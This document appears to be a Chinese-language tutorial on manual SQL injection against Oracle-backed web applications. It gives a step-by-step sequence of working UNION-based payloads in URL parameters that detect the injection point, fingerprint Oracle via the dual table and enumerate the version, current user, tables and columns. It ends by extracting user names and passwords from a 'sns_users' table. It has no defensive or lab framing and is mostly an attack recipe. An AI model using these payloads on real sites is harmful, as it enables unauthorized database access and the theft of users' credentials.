oracle手动注入

1、首先判断是否存在注入点 and 1=1/and 1=2

2、然后在判断是什么类型数据库and (select count () from dual)>0**
Ps：Dual为oracle的一个默认表
eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0，正常则表示为Oracle数据库

3、判断列数order by 看页面是否正常显示

4、联合注入， union select null,null from dual
然后改变null为字符型,如‘null’，判断显示位

5、根据显示位，查看数据库版本信息及当前数据库
eg:?id=-1 union select ‘null’, (select banner from sys.v_$version where rownum=1) from dual

eg:?id=-1 union select ‘null’, (SELECT name FROM v$database) from dual

6、查看当前用户
eg:?id=-1 union select ‘null’, (select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual) from dual

7、直接跑所有表
eg:?id=-1 union select ‘null’, TABLE_NAME from USER_TABLES

eg:?id=-1 union select ‘null’,(select table_name from user_tables where rownum=1) from dual

eg:?id=-1 union select ‘null’,(select table_name from user_tables where rownum=1 and table_name like ‘%user%’) from dual
等价于union select ‘null’,(select table_name from user_tables where table_name like ‘%user%’) from dual

8、跑表字段
union select null,COLUMN_NAME from user_tab_columns/all_tab_columns where TABLE_NAME=‘具体表名’
eg:?id=-1 union select ‘null’,(select column_name from user_tab_columns where rownum=1 and table_name=‘sns_users’) from dual
等价于
union select ‘null’,(select column_name from all_tab_columns where rownum=1 and table_name=‘sns_users’) from dual

union select ‘null’,(select column_name from user_tab_columns where rownum=1 and table_name=‘sns_users’ and column_name not in (‘USER_NAME’)) from dual

union select ‘null’,(select column_name from user_tab_columns where rownum=1 and table_name=‘sns_users’ and column_name not in (‘USER_NAME’) and column_name not in (‘USER_PWD’) ) from dual

9跑数据
union select ‘null’, 字段1||’=’||字段2,null from 具体表名

eg:?id=-1 union select user_name,user_pwd from "sns_users"

eg:union select user_name,user_pwd from “sns_users” where user_name<>‘hu’

2. 连接多个字段用到的连接符号是||,在oracle数据库中，concat函数只能连接两个字符串.union select 1,字段1||字段2…||字段n from 表名

eg:?id=-1 union select user_name||’=’||user_pwd,‘null’ from “sns_users” where user_name not in(‘hu’)

union select user_name||user_pwd,‘null’ from “sns_users” where user_name not in(‘hu’)

union select ‘null’,user_name||user_pwd from “sns_users”